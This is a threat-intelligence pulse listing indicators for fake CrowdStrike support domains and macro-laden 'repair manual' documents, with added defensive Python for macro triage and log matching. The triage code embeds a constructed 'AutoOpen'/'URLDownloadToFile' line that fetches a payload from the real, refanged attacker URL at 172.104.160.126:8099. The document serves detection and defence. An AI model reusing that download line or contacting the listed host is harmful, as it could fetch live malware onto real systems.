Pulse: Fake CrowdStrike repair manual containing malicious macros | Fake Crowdstrike Domains
TLP:WHITE   Author: CyberMike   Created: 2024-07-23   Modified: 2024-08-22
Indicators: 76 (high volume)
Following the CrowdStrike outage, this pulse lists IoCs for fake domains posing as CrowdStrike support, together with recent phishing attempts indicating that actors are distributing fake repair guides that contain malicious macros.
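The "fake help guide" lure described above arrives as a Word document whose macro fetches a second stage (see the SHA256 row below whose description names http[:]//172.104.160[.]126:8099/payload2.txt). The following is an added triage example, not code from the pulse or from CrowdStrike: it builds a constructed, macro-enabled OOXML document in memory (a fake vbaProject.bin carrying that download URL), confirms the document is a zip container, flags the VBA part, extracts URL-looking strings from it, and checks them against the refanged URL from the pulse. The `build_sample` helper and its contents are constructed for the demonstration.

```python
"""Triage of a Word document for VBA macros and embedded download URLs.

Added example, not code from the pulse. The sample document below is
constructed in memory; the only real-world value is the C2 URL quoted
(defanged) in the pulse's indicator table.
"""
import io
import re
import zipfile

# Defanged URL from the pulse, refanged here for matching.
PULSE_PAYLOAD_URL = "http://172.104.160.126:8099/payload2.txt"

# Where OOXML containers keep VBA code; a .docx with one of these is really a macro doc.
MACRO_PARTS = ("word/vbaProject.bin", "xl/vbaProject.bin", "ppt/vbaProject.bin")

URL_RE = re.compile(rb"https?://[A-Za-z0-9\.\-_]+(?::\d{1,5})?(?:/[^\s\"'<>]*)?")


def refang(url: str) -> str:
    """Turn the defanged form used in the pulse back into a matchable URL."""
    return url.replace("hxxp", "http").replace("[:]", ":").replace("[.]", ".")


def triage_ooxml(blob: bytes) -> dict:
    """Report macro presence, URLs seen in the VBA part, and a hit on the pulse URL."""
    result = {"is_zip": False, "macro_parts": [], "urls": [], "ioc_hit": False}
    # Legacy .doc files are OLE2 compound files, not zips; they need a different parser.
    if not blob.startswith(b"PK\x03\x04"):
        return result
    result["is_zip"] = True
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        names = set(zf.namelist())
        result["macro_parts"] = [p for p in MACRO_PARTS if p in names]
        for part in result["macro_parts"]:
            for match in URL_RE.findall(zf.read(part)):
                url = match.decode("ascii", "replace")
                if url not in result["urls"]:
                    result["urls"].append(url)
    result["ioc_hit"] = PULSE_PAYLOAD_URL in result["urls"]
    return result


def build_sample(with_macro: bool) -> bytes:
    """Constructed sample: a minimal OOXML zip, optionally with a fake VBA part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # A real vbaProject.bin is an OLE stream with MS-OVBA-compressed modules;
            # a raw blob containing the URL is enough to exercise the scan.
            zf.writestr(
                "word/vbaProject.bin",
                b"\x00Sub AutoOpen()\x00URLDownloadToFile \""
                + PULSE_PAYLOAD_URL.encode() + b"\"\x00",
            )
    return buf.getvalue()


if __name__ == "__main__":
    for label, blob in (("clean", build_sample(False)), ("macro", build_sample(True))):
        print(label, triage_ooxml(blob))
```

Two caveats a triage analyst should keep in mind: real VBA module streams inside vbaProject.bin are compressed (MS-OVBA), so a raw string scan like this one only catches URLs that happen to sit uncompressed in the stream; a tool that decompresses the modules (oletools' olevba) is the proper next step. And a document that is not a zip is not automatically safe: the legacy binary .doc format carries macros in OLE2 storage and is simply out of scope for this check.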
MITRE ATT&CK & Malware Families
ATT&CK techniques: none listed
Malware families: Remcos Linux Daolpu Understand Info
Indicators of Compromise (76)
TYPE INDICATOR DESCRIPTION CREATED
FileHash-MD5 d845c7b471d9adc14942f95105d5ffcf 2024-07-23
FileHash-SHA256 1bbb795ce19f4dcc4ac9f8e8c12f3452f1f07c68a53ef631c76e392e1d06ea43 2024-07-23
FileHash-SHA256 4491901eff338ab52c85a77a3fbd3ce80fda738046ee3b7da7be468da5b331a3 2024-07-23
FileHash-SHA256 70865e5a49b8c270eb8175c36cd2a2032c05445c0daf59dc67e78dad545ff9e4 2024-07-23
FileHash-SHA256 96dec6e07229201a02f538310815c695cf6147c548ff1c6a0def2fe38f3dcbc8 2024-07-23
URL http://hoo.be/crowdstrike 2024-07-23
domain bsodsm8rlixamzgjedu.com 2024-07-23
domain clownstrike.co 2024-07-23
domain clownstrike.co.uk 2024-07-23
domain crashstrike.com 2024-07-23
domain crowdfalcon-immed-update.com 2024-07-23
domain crowdstrike-bluescreen.com 2024-07-23
domain crowdstrike-bsod.com 2024-07-23
domain crowdstrike-falcon.online 2024-07-23
domain crowdstrike-helpdesk.com 2024-07-23
domain crowdstrike-out.com 2024-07-23
domain crowdstrike.black 2024-07-23
domain crowdstrike.com.vc 2024-07-23
domain crowdstrike.es 2024-07-23
domain crowdstrike.fail 2024-07-23
domain crowdstrike0day.com 2024-07-23
domain crowdstrikebluescreen.com 2024-07-23
domain crowdstrikebug.com 2024-07-23
domain crowdstrikeclaim.com 2024-07-23
domain crowdstrikeclaims.com 2024-07-23
domain crowdstrikeclassaction.com 2024-07-23
domain crowdstrikedoomsday.com 2024-07-23
domain crowdstrikedown.site 2024-07-23
domain crowdstrikefail.com 2024-07-23
domain crowdstrikefix.com 2024-07-23
domain crowdstrikefixer.com 2024-07-23
domain crowdstrikeglitch.com 2024-07-23
domain crowdstrikehealthcare.com 2024-07-23
domain crowdstrikelawsuit.com 2024-07-23
domain crowdstrikeold.com 2024-07-23
domain crowdstrikeoops.com 2024-07-23
domain crowdstrikeoopsie.com 2024-07-23
domain crowdstrikeout.com 2024-07-23
domain crowdstrikeoutage.com 2024-07-23
domain crowdstrikeoutage.info 2024-07-23
domain crowdstrikerecovery.com 2024-07-23
domain crowdstrikereport.com 2024-07-23
domain crowdstrikesucks.com 2024-07-23
domain crowdstrikesuporte.com 2024-07-23
domain crowdstriketoken.com 2024-07-23
domain crowdstrikeupdate.com 2024-07-23
domain crowdstrikewindowsoutage.com 2024-07-23
domain crowdstrikezeroday.com 2024-07-23
domain crowdstuck.org 2024-07-23
domain failstrike.com 2024-07-23
domain fix-crowdstrike-apocalypse.com 2024-07-23
domain fix-crowdstrike-bsod.com 2024-07-23
domain isitcrowdstrike.com 2024-07-23
domain microsoftcrowdstrike.com 2024-07-23
domain supportfalconcrowdstrikel.com 2024-07-23
domain whatiscrowdstrike.com 2024-07-23
domain winsstrike.com 2024-07-23
email update@crowdstrike.com.vc 2024-07-23
hostname crowdstrike.orora.group 2024-07-23
hostname crowdstrike.phpartners.org 2024-07-23
hostname crowdstrike.woccpa.com 2024-07-23
hostname sinkhole-d845c7b471d9adc14942f95105d5ffcf.crowdstrikeupdate.com 2024-07-23
FileHash-SHA256 803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61 This is a file that has been observed containing malicious macros that execute DLLs from the URL http[:]//172.104.160[.]126:8099/payload2.txt. This file is typically 2024-07-23
FileHash-SHA256 5eaf0f1c1d23f4372e24eb15ee969552c416a38dbc45e4f2b4af283e3bfb8721 2024-07-23
FileHash-MD5 9f28eef343b1a1c3639446b98b365cc9 MD5 of 3a9323a939fbecbc6d0ceb5c1e1f3ebde91e9f186b46fdf3ba1aee03d1d41cd8 2024-07-23
FileHash-MD5 d67ea3b362d4e9b633216e85ac643d1f MD5 of 5eaf0f1c1d23f4372e24eb15ee969552c416a38dbc45e4f2b4af283e3bfb8721 2024-07-23
FileHash-MD5 dd2100dfa067caae416b885637adc4ef MD5 of 803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61 2024-07-23
FileHash-MD5 eb29329de4937b34f218665da57bcef4 MD5 of 4ad9845e691dd415420e0c253ba452772495c0b971f48294b54631e79a22644a 2024-07-23
FileHash-SHA1 1ba68f4e998ee1e405dac983084e7ef5b2d08664 SHA1 of 4ad9845e691dd415420e0c253ba452772495c0b971f48294b54631e79a22644a 2024-07-23
FileHash-SHA1 499f8881f4927e7b4a1a0448f62c60741ea6d44b SHA1 of 803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61 2024-07-23
FileHash-SHA1 4ca0ecbbb4048e52e409f6f09562761dcc22d05f SHA1 of 3a9323a939fbecbc6d0ceb5c1e1f3ebde91e9f186b46fdf3ba1aee03d1d41cd8 2024-07-23
FileHash-SHA1 53d1c13de6e049a5b41fd3b6e5876060f73d28eb SHA1 of 5eaf0f1c1d23f4372e24eb15ee969552c416a38dbc45e4f2b4af283e3bfb8721 2024-07-23
FileHash-SHA256 00199b4784533a124da96be5d5e472195b0e27be15007dcbd573c0fb29941d99 2024-07-23
FileHash-SHA256 3a9323a939fbecbc6d0ceb5c1e1f3ebde91e9f186b46fdf3ba1aee03d1d41cd8 2024-07-23
FileHash-SHA256 4ad9845e691dd415420e0c253ba452772495c0b971f48294b54631e79a22644a 2024-07-23
YARA 1f7e214c86e4133c96143c403f9e60315c5ca4b0 C++ stealer delivered via Word documents with macros impersonating CS 2024-07-23
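The table above mixes several indicator types that need different matching rules: a DNS or proxy hit on any subdomain of a listed domain counts (the sinkhole entry under crowdstrikeupdate.com shows why), exact hostnames and URLs match as given, and the MD5/SHA1 rows are explicitly cross-referenced to SHA256 rows for the same sample, so an alert carrying only an MD5 must still resolve to that sample. The following is an added example, not code from the pulse: it loads a subset of the indicators copied from the table, scans constructed proxy, DNS and mail log lines, resolves hashes across the three algorithms, and adds a brand-string heuristic for domains the pulse does not yet list. The `SAMPLE_LOGS`, their format, and the `ALLOWLIST` of genuine vendor hostnames are assumptions for the demonstration.

```python
"""Match log lines and hashes against indicators from the pulse.

Added example, not part of the pulse. Indicator values are copied from the
table above (a subset); log lines and the allowlist are constructed.
"""
import re
from urllib.parse import urlsplit

PULSE_DOMAINS = {
    "crowdstrike-helpdesk.com", "crowdstrikeupdate.com", "crowdstrikefix.com",
    "crowdstrike.com.vc", "fix-crowdstrike-bsod.com", "clownstrike.co",
}
PULSE_HOSTNAMES = {"crowdstrike.orora.group", "crowdstrike.phpartners.org"}
PULSE_URLS = {"http://hoo.be/crowdstrike"}

# The macro document from the table, keyed by all three digests the pulse lists for it.
DOC_SHA256 = "803727ccdf441e49096f3fd48107a5fe55c56c080f46773cd649c9e55ec1be61"
PULSE_HASHES = {
    DOC_SHA256: DOC_SHA256,
    "dd2100dfa067caae416b885637adc4ef": DOC_SHA256,          # MD5 row
    "499f8881f4927e7b4a1a0448f62c60741ea6d44b": DOC_SHA256,  # SHA1 row
}

# Assumed: the vendor's own hostnames, which lookalikes imitate; never flag these.
ALLOWLIST = {"crowdstrike.com", "falcon.crowdstrike.com"}

# Either a URL or a bare dotted hostname inside a log line.
LOG_RE = re.compile(r"\b(?:https?://\S+|(?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)


def is_allowlisted(host: str) -> bool:
    return host in ALLOWLIST or any(host.endswith("." + a) for a in ALLOWLIST)


def host_matches(host: str):
    """Exact hostname hit, or any subdomain of a listed domain; None otherwise."""
    host = host.lower().rstrip(".")
    if is_allowlisted(host):
        return None
    if host in PULSE_HOSTNAMES:
        return ("hostname", host)
    for d in PULSE_DOMAINS:
        if host == d or host.endswith("." + d):
            return ("domain", d)
    return None


def brand_lookalike(host: str) -> bool:
    """Hunting heuristic, not a blocklist: brand string in a label outside the vendor's domain."""
    host = host.lower()
    if is_allowlisted(host):
        return False
    return any("crowdstrike" in lbl or lbl.endswith("strike") for lbl in host.split("."))


def hash_lookup(digest: str):
    """Resolve an MD5, SHA1 or SHA256 from an alert to the pulse's SHA256 for that sample."""
    d = digest.strip().lower()
    return PULSE_HASHES.get(d) if len(d) in (32, 40, 64) else None


def scan_line(line: str):
    hits = []
    for tok in LOG_RE.findall(line):
        if "://" in tok:
            if tok in PULSE_URLS:
                hits.append(("url", tok))
                continue
            host = urlsplit(tok).hostname or ""
        else:
            host = tok
        m = host_matches(host)
        if m:
            hits.append(m)
    return hits


def scan_logs(lines):
    return [scan_line(l) for l in lines]


# Constructed log lines in an assumed format; the indicators in them come from the table.
SAMPLE_LOGS = [
    "2024-07-23T10:01:02Z proxy user=alice GET http://crowdstrike-helpdesk.com/fix.docm 200",
    "2024-07-23T10:02:11Z dns query=sinkhole-d845c7b471d9adc14942f95105d5ffcf.crowdstrikeupdate.com type=A",
    "2024-07-23T10:03:45Z proxy user=bob GET https://falcon.crowdstrike.com/support 200",
    "2024-07-23T10:04:00Z smtp from=update@crowdstrike.com.vc subject=Repair manual",
    "2024-07-23T10:05:00Z proxy user=carol GET http://hoo.be/crowdstrike 302",
]

if __name__ == "__main__":
    for line, hits in zip(SAMPLE_LOGS, scan_logs(SAMPLE_LOGS)):
        print(hits, "<-", line)
```

Keep the allowlist check ahead of the domain check: several listed domains (crowdstrike.com.vc, microsoftcrowdstrike.com) are chosen to read like the real one, and a suffix match written carelessly would either miss them or start flagging the vendor's own hosts. The `brand_lookalike` heuristic deliberately sits apart from the indicator match because the pulse itself lists commentary and lawsuit sites alongside phishing infrastructure; it is a hunting lead, not grounds for a block.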